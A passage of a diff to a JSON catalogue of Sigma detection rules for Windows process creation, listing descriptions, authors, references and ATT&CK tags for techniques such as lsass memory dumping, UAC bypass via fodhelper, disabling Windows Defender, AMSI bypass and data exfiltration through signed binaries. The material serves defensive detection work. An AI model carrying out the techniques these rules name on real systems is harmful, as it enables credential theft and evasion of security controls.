"c4e49831-1496-40cf-8ce1-b53f942b02f9", - "value": "Renamed PAExec" - }, - { - "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/09", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_rpcping.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", - "https://twitter.com/vysecurity/status/974806438316072960", - "https://twitter.com/vysecurity/status/873181705024266241", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rpcping.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", - "value": "Capture Credentials with Rpcping.exe" - }, - { - "description": "Detects suspicious process related to rundll32 based on arguments", - "meta": { - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", - "creation_date": "2019/01/16", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_rundll32_activity.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", - "https://twitter.com/Hexacorn/status/885258886428725250", - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", - "https://twitter.com/nas_bench/status/1433344116071583746", - "https://twitter.com/eral4m/status/1479106975967240209", - "https://twitter.com/eral4m/status/1479080793003671557", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "value": "Suspicious Rundll32 Activity" - }, - { - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/22", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" - ], - "filename": "proc_creation_win_susp_rundll32_by_ordinal.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", - "https://github.com/Neo23x0/DLLRunner", - "https://twitter.com/cyb3rops/status/1186631731543236608", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "value": "Suspicious Call by Ordinal" - }, - { - "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_rundll32_inline_vbs.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_inline_vbs.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ] - }, - "uuid": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", - "value": "Suspicious Rundll32 Invoking Inline VBScript" - }, - { - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/14", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_rundll32_js_runhtmlapplication.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", - "value": "Rundll32 JS RunHTMLApplication Pattern" - }, - { - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/04/21", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_rundll32_keymgr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/NinjaParanoid/status/1516442028963659777", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_keymgr.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ] - }, - "uuid": "a4694263-59a8-4608-a3a0-6f8d3a51664c", - "value": "Suspicious Key Manager Access" - }, - { - "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/05/27", - "falsepositive": [ - "Possible but rare" - ], - "filename": "proc_creation_win_susp_rundll32_no_params.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.cobaltstrike.com/help-opsec", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_no_params.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", - "value": "Suspicious Rundll32 Without Any CommandLine Params" - }, - { - "description": "Detects suspicious process related to rundll32 based on arguments", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", "meta": { "author": "frack113", - "creation_date": "2021/12/04", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_rundll32_script_run.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.011/T1218.011.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_script_run.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "73fcad2e-ff14-4c38-b11d-4172c8ac86c7", - "value": "Suspicious Rundll32 Script in CommandLine" - }, - { - "description": "setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.", - "meta": { - "author": "Konstantin Grishchenko, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "Scripts and administrative tools that use INF files for driver installation with setupapi.dll" - ], - "filename": "proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Setupapi/", - "https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf", - "https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf", - "https://twitter.com/Z3Jpa29z/status/1313742350292746241?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_setupapi_installhinfsection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "285b85b1-a555-4095-8652-a8a4106af63f", - "value": "Suspicious Rundll32 Setupapi.dll Activity" - }, - { - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "meta": { - "author": "elhoim, CD_ROM_", - "creation_date": "2022/04/27", + "creation_date": "2021/07/16", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_rundll32_spawn_explorer.yml", + "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1216" + ] + }, + "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code" + }, + { + "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Some false positives may occure with other tools with similar commandlines" + ], + "filename": "proc_creation_win_chisel_usage.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/intelligence-insights-november-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_spawn_explorer.yml" + "https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/", + "https://github.com/jpillora/chisel/", + "https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_chisel_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090.001" + ] + }, + "uuid": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "value": "Chisel Tunneling Tool Usage" + }, + { + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/24", + "falsepositive": [ + "Legitimate use of the impacket tools" + ], + "filename": "proc_creation_win_impacket_compiled_tools.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_compiled_tools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ] + }, + "uuid": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", + "value": "Impacket Tool Execution" + }, + { + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_reg_service_imagepath_change.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_service_imagepath_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.011" + ] + }, + "uuid": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "value": "Service ImagePath Change with Reg.exe" + }, + { + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + ], + "filename": "proc_creation_win_susp_vboxdrvinst.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", + "https://twitter.com/pabraeken/status/993497996179492864", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112" ] }, - "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", - "value": "RunDLL32 Spawning Explorer" + "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", + "value": "Suspicious VBoxDrvInst.exe Parameters" + }, + { + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ] + }, + "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", + "value": "Suspicious ConfigSecurityPolicy Execution" + }, + { + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.youtube.com/watch?v=Ie831jF0bb0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "value": "Process Access via TrolleyExpress Exclusion" + }, + { + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "meta": { + "author": "ok @securonix invrep-de, oscd.community, frack113", + "creation_date": "2020/10/12", + "falsepositive": [ + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + ], + "filename": "proc_creation_win_disable_defender_av_security_monitoring.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_disable_defender_av_security_monitoring.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "value": "Disable Windows Defender AV Security Monitoring" + }, + { + "description": "Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.", + "meta": { + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of fodhelper.exe utility by legitimate user" + ], + "filename": "proc_creation_win_uac_bypass_fodhelper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md", + "https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "7f741dcf-fc22-4759-87b4-9ae8376676a2", + "value": "Bypass UAC via Fodhelper.exe" + }, + { + "description": "Detects the use of NPS a port forwarding tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/08", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_nps.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/ehang-io/nps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nps.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "68d37776-61db-42f5-bf54-27e87072d17e", + "value": "NPS Tunneling Tool" + }, + { + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/02/04", + "falsepositive": [ + "Very unlikely" + ], + "filename": "proc_creation_win_hack_dumpert.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/outflanknl/Dumpert", + "https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_dumpert.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "2704ab9e-afe2-4854-a3b1-0c0706d03578", + "value": "Dumpert Process Dumper" + }, + { + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_amsi_null_bits_bypass.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_amsi_null_bits_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "92a974db-ab84-457f-9ec0-55db83d7a825", + "value": "Potential AMSI Bypass Using NULL Bits - ProcessCreation" + }, + { + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_invoke_obfuscation_via_rundll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", + "value": "Invoke-Obfuscation RUNDLL LAUNCHER" + }, + { + "description": "Detects possible payload obfuscation via the commandline", + "meta": { + "author": "frack113", + "creation_date": "2022/02/15", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_cmd_dosfuscation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", + "value": "Suspicious Dosfuscation Character in Commandline" + }, + { + "description": "Adversaries may search for private key certificate files on compromised systems for insecurely stored credential", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_discover_private_keys.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_discover_private_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "213d6a77-3d55-4ce8-ba74-fcfef741974e", + "value": "Discover Private Keys" + }, + { + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "meta": { + "author": "Sreeman", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_credential_access_via_password_filter.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/", + "https://github.com/3gstudent/PasswordFilter/tree/master/PasswordFilter", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_credential_access_via_password_filter.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1556.002" + ] + }, + "uuid": "b7966f4a-b333-455b-8370-8ca53c229762", + "value": "Dropping Of Password Filter DLL" + }, + { + "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_comrat_may20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" + ] + }, + "uuid": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", + "value": "Turla Group Commands May 2020" + }, + { + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "value": "Net WebClient Casing Anomalies" }, { "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", @@ -53308,1068 +43172,443 @@ "value": "Suspicious Rundll32 Activity Invoking Sys File" }, { - "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications.", "meta": { "author": "frack113", - "creation_date": "2022/06/04", - "falsepositive": [ - "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" - ], - "filename": "proc_creation_win_susp_rundll32_user32_dll.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", - "value": "Suspicious Workstation Locking via Rundll32" - }, - { - "description": "This rule detects the execution of Run Once task as configured in the registry", - "meta": { - "author": "Avneet Singh @v3t0_, oscd.community", - "creation_date": "2020/10/18", + "creation_date": "2021/07/27", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_runonce_execution.yml", + "filename": "proc_creation_win_clip.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/990717080805789697", - "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runonce_execution.yml" + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.collection", + "attack.t1115" ] }, - "uuid": "198effb6-6c98-4d0c-9ea3-451fa143c45c", - "value": "Run Once Task Execution as Configured in Registry" + "uuid": "ddeff553-5233-4ae9-bbab-d64d2bd634be", + "value": "Use of CLIP" }, { - "description": "Detects execution of powershell scripts via Runscripthelper.exe", + "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": "2020/10/09", + "author": "frack113", + "creation_date": "2021/07/13", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_runscripthelper.yml", + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_runscripthelper.yml" + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", + "value": "File Download Using ProtocolHandler.exe" + }, + { + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2022/08/12", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_add_local_admin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", + "value": "Add User to Local Administrators" + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/24", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" ], "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1059.001" ] }, - "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", - "value": "Suspicious Runscripthelper.exe" + "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "value": "Usage Of Web Request Commands And Cmdlets" }, { - "description": "Detects suspicious process run from unusual locations", + "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", "meta": { - "author": "juju4, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2019/01/16", + "author": "Florian Roth", + "creation_date": "2022/01/04", "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], - "filename": "proc_creation_win_susp_run_locations.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://car.mitre.org/wiki/CAR-2013-05-002", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_run_locations.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "car.2013-05-002" - ] - }, - "uuid": 